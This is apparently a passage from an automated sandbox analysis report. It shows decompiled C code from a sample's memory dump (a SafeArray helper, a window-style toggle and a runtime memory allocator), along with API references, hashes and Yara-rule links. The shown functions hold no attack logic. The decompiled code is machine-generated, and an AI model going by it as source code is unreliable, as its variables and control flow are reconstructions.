					_push(_v808);
					_push(_v776);
					L0042F04C();
					return L00430EC8(_v776);
				} else {
					if((_t55 & 0x00000040) == 0) {
						_v792 = _v808[4];
					} else {
						_v792 =  *(_v808[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t103 = _v788 - 1;
					if(_t103 < 0) {
						L9:
						_push( &_v772);
						_t64 = _v788;
						_push(_t64);
						_push(0xc);
						L0042F628();
						_t123 = _t64;
						if(_t123 == 0) {
							E00430C20(_t110);
						}
						L00431164(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t123;
						_t105 = _v788 - 1;
						if(_t105 < 0) {
							L14:
							_t107 = _v788 - 1;
							if(E00431694(_v788 - 1, _t125) != 0) {
								L0042F650();
								L00430EC8(_v792);
								L0042F650();
								L00430EC8( &_v260);
								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t72 = E004316C4(_t107, _t125);
						} else {
							_t108 = _t105 + 1;
							_t83 =  &_v768;
							_t118 =  &_v260;
							do {
								 *_t118 =  *_t83;
								_t118 = _t118 + 4;
								_t83 = _t83 + 8;
								_t108 = _t108 - 1;
							} while (_t108 != 0);
							do {
								goto L14;
							} while (_t72 != 0);
							return _t72;
						}
					} else {
						_t109 = _t103 + 1;
						_t122 = 0;
						_t124 =  &_v772;
						do {
							_v804 = _t124;
							_push(_v804 + 4);
							_t23 = _t122 + 1; // 0x1
							_push(_v792);
							L0042F630();
							L00430EC8(_v792);
							_push( &_v784);
							_t26 = _t122 + 1; // 0x1
							_push(_v792);
							L0042F638();
							L00430EC8(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t122 = _t122 + 1;
							_t124 = _t124 + 8;
							_t109 = _t109 - 1;
						} while (_t109 != 0);
						goto L9;
					}
				}
			}





























                                                                    0x0043171c
                                                                    0x00431728
                                                                    0x0043172e
                                                                    0x00431734
                                                                    0x00431744
                                                                    0x0043174b
                                                                    0x0043174b
                                                                    0x00431756
                                                                    0x00431764
                                                                    0x004318ef
                                                                    0x004318f6
                                                                    0x004318f7
                                                                    0x00000000
                                                                    0x0043176a
                                                                    0x0043176d
                                                                    0x0043178b
                                                                    0x0043176f
                                                                    0x0043177a
                                                                    0x0043177a
                                                                    0x0043179a
                                                                    0x004317a6
                                                                    0x004317a9
                                                                    0x00431816
                                                                    0x0043181c
                                                                    0x0043181d
                                                                    0x00431823
                                                                    0x00431824
                                                                    0x00431826
                                                                    0x0043182b
                                                                    0x0043182f
                                                                    0x00431831
                                                                    0x00431831
                                                                    0x0043183c
                                                                    0x00431847
                                                                    0x00431852
                                                                    0x0043185b
                                                                    0x0043185e
                                                                    0x0043187a
                                                                    0x00431881
                                                                    0x0043188c
                                                                    0x004318a3
                                                                    0x004318a8
                                                                    0x004318bc
                                                                    0x004318c1
                                                                    0x004318d4
                                                                    0x004318d4
                                                                    0x004318dd
                                                                    0x00431860
                                                                    0x00431860
                                                                    0x00431861
                                                                    0x00431867
                                                                    0x0043186d
                                                                    0x0043186f
                                                                    0x00431871
                                                                    0x00431874
                                                                    0x00431877
                                                                    0x00431877
                                                                    0x0043187a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0043187a
                                                                    0x004317ab
                                                                    0x004317ab
                                                                    0x004317ac
                                                                    0x004317ae
                                                                    0x004317b4
                                                                    0x004317b6
                                                                    0x004317c5
                                                                    0x004317c6
                                                                    0x004317d0
                                                                    0x004317d1
                                                                    0x004317d6
                                                                    0x004317e1
                                                                    0x004317e2
                                                                    0x004317ec
                                                                    0x004317ed
                                                                    0x004317f2
                                                                    0x0043180d
                                                                    0x0043180f
                                                                    0x00431810
                                                                    0x00431813
                                                                    0x00431813
                                                                    0x00000000
                                                                    0x004317b4
                                                                    0x004317a9

                                                                    APIs
                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004317D1
                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004317ED
                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00431826
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004318A3
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004318BC
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 004318F7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                    • String ID:
                                                                    • API String ID: 351091851-0
                                                                    • Opcode ID: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                                    • Instruction ID: ede279f2d9249a03c5eeb803d5e3445196a0ad83b08d93498a0369a0c14e8414
                                                                    • Opcode Fuzzy Hash: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                                    • Instruction Fuzzy Hash: 41512D75A002299FCB62DB59CD81BD9B3FCAF0C304F4455EAE508E7212D634AF858F58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006AE6F8, Relevance: 9.1, APIs: 6, Instructions: 66COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E006AE6F8(signed int __eax) {
				intOrPtr* _t14;
				signed int _t18;
				intOrPtr* _t19;
				intOrPtr* _t23;
				signed int _t26;
				long _t27;
				intOrPtr* _t29;
				intOrPtr* _t33;
				signed int _t37;
				intOrPtr* _t38;

				_t37 = __eax;
				 *0x6d6827 = __eax ^ 0x00000001;
				_t14 =  *0x6cdec4; // 0x6d579c
				_t18 = GetWindowLongW( *( *_t14 + 0x188), 0xffffffec) & 0xffffff00 | (_t17 & 0x00000080) == 0x00000000;
				if(_t37 != _t18) {
					_t19 =  *0x6cdec4; // 0x6d579c
					SetWindowPos( *( *_t19 + 0x188), 0, 0, 0, 0, 0, 0x97);
					_t23 =  *0x6cdec4; // 0x6d579c
					_t26 = GetWindowLongW( *( *_t23 + 0x188), 0xffffffec);
					if(_t37 == 0) {
						_t27 = _t26 | 0x00000080;
					} else {
						_t27 = _t26 & 0xffffff7f;
					}
					_t38 =  *0x6cdec4; // 0x6d579c
					SetWindowLongW( *( *_t38 + 0x188), 0xffffffec, _t27);
					if(_t37 == 0) {
						_t29 =  *0x6cdec4; // 0x6d579c
						return SetWindowPos( *( *_t29 + 0x188), 0, 0, 0, 0, 0, 0x57);
					} else {
						_t33 =  *0x6cdec4; // 0x6d579c
						return ShowWindow( *( *_t33 + 0x188), 5);
					}
				}
				return _t18;
			}













                                                                    0x006ae6f9
                                                                    0x006ae6ff
                                                                    0x006ae704
                                                                    0x006ae71b
                                                                    0x006ae720
                                                                    0x006ae735
                                                                    0x006ae743
                                                                    0x006ae748
                                                                    0x006ae758
                                                                    0x006ae75f
                                                                    0x006ae768
                                                                    0x006ae761
                                                                    0x006ae761
                                                                    0x006ae761
                                                                    0x006ae76d
                                                                    0x006ae77f
                                                                    0x006ae786
                                                                    0x006ae7ab
                                                                    0x00000000
                                                                    0x006ae788
                                                                    0x006ae78a
                                                                    0x00000000
                                                                    0x006ae798
                                                                    0x006ae786
                                                                    0x006ae7bf

                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 006AE714
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,006B78BD,00000000,006B81F9), ref: 006AE743
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 006AE758
                                                                    • SetWindowLongW.USER32 ref: 006AE77F
                                                                    • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 006AE798
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 006AE7B9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$Long$Show
                                                                    • String ID:
                                                                    • API String ID: 3609083571-0
                                                                    • Opcode ID: cbd293cfec67b64efc79bc9d205490811c8f395d7711b658bf93e82dc89e2f59
                                                                    • Instruction ID: c5f2d3f14be40374ea6ae40072baf741f42d7864aa45c80e1917733d0618a2ec
                                                                    • Opcode Fuzzy Hash: cbd293cfec67b64efc79bc9d205490811c8f395d7711b658bf93e82dc89e2f59
                                                                    • Instruction Fuzzy Hash: FC111C75745200AFD700EB68DD81FE237EAAB9E314F4541A5F6158F3E2CA65EC40DB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405A04, Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 68%
                                                                    			E00405A04(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				intOrPtr* _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				intOrPtr* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				intOrPtr* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t95 = __eax;
				_t129 =  *0x6cf05d; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t2 = _t162 + 0x10010; // 0x10110
							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t121 = VirtualAlloc(0, _t156, 0x101000, 4);
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E00405764();
								_t99 =  *0x6d1b84; // 0x6d1b80
								 *_t147 = 0x6d1b80;
								 *0x6d1b84 = _t121;
								 *((intOrPtr*)(_t147 + 4)) = _t99;
								 *_t99 = _t121;
								 *0x6d1b7c = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t67 = _t95 + 0xd3; // 0x1d3
						_t125 = (_t67 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x6cfaec], ah");
								if(__eflags == 0) {
									goto L42;
								}
								asm("pause");
								__eflags =  *0x6cf98d;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									asm("lock cmpxchg [0x6cfaec], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L42;
							}
						}
						L42:
						_t68 = _t125 - 0xb30; // -2445
						_t141 = _t68;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x6cfafc + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x6cfaf8;
							if((0xfffffffe << _t132 &  *0x6cfaf8) == 0) {
								_t133 =  *0x6cfaf4; // 0x0
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E004056E8(_t125);
								} else {
									_t110 =  *0x6cfaf0; // 0x385e890
									_t109 = _t110 - _t125;
									 *0x6cfaf0 = _t109;
									 *0x6cfaf4 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x6cfaec = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L50;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L50:
							_push(_t152);
							_push(_t145);
							_t148 = 0x6cfb7c + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x6cfafc + _t142 * 4;
								 *_t80 =  *(0x6cfafc + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x6cfaf8], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E0040561C(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							_t93 = _t125 + 2; // 0x1a5
							 *(_t159 - 4) = _t93;
							 *0x6cfaec = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					_t6 = __edx + 0x6cf994; // 0xc8c8c8c8
					__eax =  *_t6 & 0x000000ff;
					__ebx = 0x6c5084 + ( *_t6 & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									asm("pause");
									__eflags =  *0x6cf98d;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [ebx], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 8);
					__eax =  *(__edx + 0x10);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x18);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0x14);
						if(__eax >  *(__ebx + 0x14)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x6cf05d;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x6cfaec], ah");
									if(__eflags == 0) {
										goto L22;
									}
									asm("pause");
									__eflags =  *0x6cf98d;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [0x6cfaec], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
									goto L22;
								}
							}
							L22:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x6cfaf8;
							__eflags =  *(__ebx + 1) &  *0x6cfaf8;
							if(( *(__ebx + 1) &  *0x6cfaf8) == 0) {
								__ecx =  *(__ebx + 4) & 0x0000ffff;
								__edi =  *0x6cfaf4; // 0x0
								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
									__eax =  *(__ebx + 6) & 0x0000ffff;
									__edi = __eax;
									__eax = E004056E8(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L35;
									} else {
										 *0x6cfaec = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x6cfaf0; // 0x385e890
									__ecx =  *(__ebx + 6) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x6cfaf4 =  *0x6cfaf4 - __edi;
									 *0x6cfaf0 = __esi;
									goto L35;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x6cfafc + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x6cfafc + __eax * 4) + __eax * 8 * 4;
								__edi = 0x6cfb7c + ( *(0x6cfafc + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x6cfafc + __eax * 4;
									 *_t38 =  *(0x6cfafc + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x6cfaf8], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 6) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E0040561C(__eax, __ecx, __edx);
								}
								L35:
								_t56 = __edi + 6; // 0x6
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x6cfaec = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 0x10)) = 0;
								 *((intOrPtr*)(__esi + 0x14)) = 1;
								 *(__ebx + 0x18) = __esi;
								_t61 = __esi + 0x20; // 0x385e8b0
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 0x10) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0x14) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0x14;
							 *_t19 =  *(__edx + 0x14) + 1;
							__eflags =  *_t19;
							 *(__ebx + 0x10) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 8);
							 *(__ecx + 0xc) = __ebx;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}





























                                                                    0x00405a04
                                                                    0x00405a10
                                                                    0x00405a16
                                                                    0x00405c64
                                                                    0x00405c69
                                                                    0x00405d7c
                                                                    0x00405d7d
                                                                    0x00405d7f
                                                                    0x004057b0
                                                                    0x004057b4
                                                                    0x004057b6
                                                                    0x004057c0
                                                                    0x004057d5
                                                                    0x004057d9
                                                                    0x004057db
                                                                    0x004057dd
                                                                    0x004057e3
                                                                    0x004057e6
                                                                    0x004057eb
                                                                    0x004057f0
                                                                    0x004057f6
                                                                    0x004057fc
                                                                    0x004057ff
                                                                    0x00405801
                                                                    0x00405808
                                                                    0x00405808
                                                                    0x00405811
                                                                    0x00405d85
                                                                    0x00405d85
                                                                    0x00405d87
                                                                    0x00405d87
                                                                    0x00405c6f
                                                                    0x00405c6f
                                                                    0x00405c7b
                                                                    0x00405c7e
                                                                    0x00405c80
                                                                    0x00405c28
                                                                    0x00405c2d
                                                                    0x00405c35
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405c37
                                                                    0x00405c39
                                                                    0x00405c40
                                                                    0x00000000
                                                                    0x00405c42
                                                                    0x00405c44
                                                                    0x00405c4e
                                                                    0x00405c56
                                                                    0x00405c5a
                                                                    0x00000000
                                                                    0x00405c5a
                                                                    0x00405c56
                                                                    0x00000000
                                                                    0x00405c40
                                                                    0x00405c28
                                                                    0x00405c82
                                                                    0x00405c82
                                                                    0x00405c82
                                                                    0x00405c8a
                                                                    0x00405c8d
                                                                    0x00405c97
                                                                    0x00405c97
                                                                    0x00405c9e
                                                                    0x00405cb1
                                                                    0x00405cb5
                                                                    0x00405cbb
                                                                    0x00405cd4
                                                                    0x00405cda
                                                                    0x00405cda
                                                                    0x00405cdc
                                                                    0x00405cfa
                                                                    0x00405cde
                                                                    0x00405cde
                                                                    0x00405ce3
                                                                    0x00405ce5
                                                                    0x00405cea
                                                                    0x00405cf3
                                                                    0x00405cf3
                                                                    0x00405cff
                                                                    0x00405d07
                                                                    0x00405cbd
                                                                    0x00405cbd
                                                                    0x00405cc7
                                                                    0x00405ccf
                                                                    0x00000000
                                                                    0x00405ccf
                                                                    0x00405ca0
                                                                    0x00405ca3
                                                                    0x00405ca6
                                                                    0x00405d08
                                                                    0x00405d08
                                                                    0x00405d09
                                                                    0x00405d0a
                                                                    0x00405d11
                                                                    0x00405d14
                                                                    0x00405d17
                                                                    0x00405d1a
                                                                    0x00405d1c
                                                                    0x00405d1e
                                                                    0x00405d25
                                                                    0x00405d27
                                                                    0x00405d27
                                                                    0x00405d27
                                                                    0x00405d2e
                                                                    0x00405d30
                                                                    0x00405d30
                                                                    0x00405d2e
                                                                    0x00405d3c
                                                                    0x00405d41
                                                                    0x00405d41
                                                                    0x00405d43
                                                                    0x00405d64
                                                                    0x00405d64
                                                                    0x00405d64
                                                                    0x00405d45
                                                                    0x00405d45
                                                                    0x00405d4b
                                                                    0x00405d4e
                                                                    0x00405d52
                                                                    0x00405d58
                                                                    0x00405d5a
                                                                    0x00405d5a
                                                                    0x00405d58
                                                                    0x00405d69
                                                                    0x00405d6c
                                                                    0x00405d6f
                                                                    0x00405d7b
                                                                    0x00405d7b
                                                                    0x00405c9e
                                                                    0x00405a1c
                                                                    0x00405a1c
                                                                    0x00405a1e
                                                                    0x00405a1e
                                                                    0x00405a25
                                                                    0x00405a2c
                                                                    0x00405a84
                                                                    0x00405a84
                                                                    0x00405a89
                                                                    0x00405a8d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405a8f
                                                                    0x00405a8f
                                                                    0x00405a92
                                                                    0x00405a97
                                                                    0x00405a9b
                                                                    0x00405a9d
                                                                    0x00405a9d
                                                                    0x00405aa0
                                                                    0x00405aa5
                                                                    0x00405aa9
                                                                    0x00405aab
                                                                    0x00405aae
                                                                    0x00405ab0
                                                                    0x00405ab7
                                                                    0x00000000
                                                                    0x00405ab9
                                                                    0x00405abb
                                                                    0x00405ac0
                                                                    0x00405ac5
                                                                    0x00405ac9
                                                                    0x00405ad1
                                                                    0x00000000
                                                                    0x00405ad1
                                                                    0x00405ac9
                                                                    0x00405ab7
                                                                    0x00405aa9
                                                                    0x00000000
                                                                    0x00405a9b
                                                                    0x00405a84
                                                                    0x00405a2e
                                                                    0x00405a2e
                                                                    0x00405a31
                                                                    0x00405a34
                                                                    0x00405a39
                                                                    0x00405a3b
                                                                    0x00405a54
                                                                    0x00405a57
                                                                    0x00405a5b
                                                                    0x00405a5d
                                                                    0x00405a60
                                                                    0x00405ad8
                                                                    0x00405ad9
                                                                    0x00405ada
                                                                    0x00405ae1
                                                                    0x00405ae3
                                                                    0x00405ae3
                                                                    0x00405ae8
                                                                    0x00405af0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405af2
                                                                    0x00405af4
                                                                    0x00405afb
                                                                    0x00000000
                                                                    0x00405afd
                                                                    0x00405aff
                                                                    0x00405b04
                                                                    0x00405b09
                                                                    0x00405b11
                                                                    0x00405b15
                                                                    0x00000000
                                                                    0x00405b15
                                                                    0x00405b11
                                                                    0x00000000
                                                                    0x00405afb
                                                                    0x00405ae3
                                                                    0x00405b1c
                                                                    0x00405b20
                                                                    0x00405b20
                                                                    0x00405b26
                                                                    0x00405b98
                                                                    0x00405b9c
                                                                    0x00405ba2
                                                                    0x00405ba4
                                                                    0x00405bcc
                                                                    0x00405bd0
                                                                    0x00405bd2
                                                                    0x00405bd7
                                                                    0x00405bd9
                                                                    0x00405bdb
                                                                    0x00000000
                                                                    0x00405bdd
                                                                    0x00405bdd
                                                                    0x00405be2
                                                                    0x00405be4
                                                                    0x00405be5
                                                                    0x00405be6
                                                                    0x00405be7
                                                                    0x00405be7
                                                                    0x00405ba6
                                                                    0x00405ba6
                                                                    0x00405bac
                                                                    0x00405bb0
                                                                    0x00405bb6
                                                                    0x00405bb8
                                                                    0x00405bba
                                                                    0x00405bba
                                                                    0x00405bbc
                                                                    0x00405bbe
                                                                    0x00405bc4
                                                                    0x00000000
                                                                    0x00405bc4
                                                                    0x00405b28
                                                                    0x00405b28
                                                                    0x00405b2b
                                                                    0x00405b32
                                                                    0x00405b39
                                                                    0x00405b3c
                                                                    0x00405b3f
                                                                    0x00405b46
                                                                    0x00405b49
                                                                    0x00405b4c
                                                                    0x00405b4f
                                                                    0x00405b51
                                                                    0x00405b53
                                                                    0x00405b55
                                                                    0x00405b5a
                                                                    0x00405b5c
                                                                    0x00405b5c
                                                                    0x00405b5c
                                                                    0x00405b63
                                                                    0x00405b65
                                                                    0x00405b65
                                                                    0x00405b63
                                                                    0x00405b6c
                                                                    0x00405b71
                                                                    0x00405b74
                                                                    0x00405b7a
                                                                    0x00405be8
                                                                    0x00405be8
                                                                    0x00405be8
                                                                    0x00405b7c
                                                                    0x00405b7c
                                                                    0x00405b7e
                                                                    0x00405b82
                                                                    0x00405b84
                                                                    0x00405b87
                                                                    0x00405b8a
                                                                    0x00405b8d
                                                                    0x00405b91
                                                                    0x00405b91
                                                                    0x00405bed
                                                                    0x00405bed
                                                                    0x00405bed
                                                                    0x00405bf0
                                                                    0x00405bf3
                                                                    0x00405bf5
                                                                    0x00405bfa
                                                                    0x00405bfc
                                                                    0x00405bff
                                                                    0x00405c06
                                                                    0x00405c09
                                                                    0x00405c09
                                                                    0x00405c0c
                                                                    0x00405c10
                                                                    0x00405c13
                                                                    0x00405c16
                                                                    0x00405c18
                                                                    0x00405c18
                                                                    0x00405c1a
                                                                    0x00405c1d
                                                                    0x00405c20
                                                                    0x00405c23
                                                                    0x00405c24
                                                                    0x00405c25
                                                                    0x00405c26
                                                                    0x00405c26
                                                                    0x00405a62
                                                                    0x00405a62
                                                                    0x00405a62
                                                                    0x00405a62
                                                                    0x00405a66
                                                                    0x00405a69
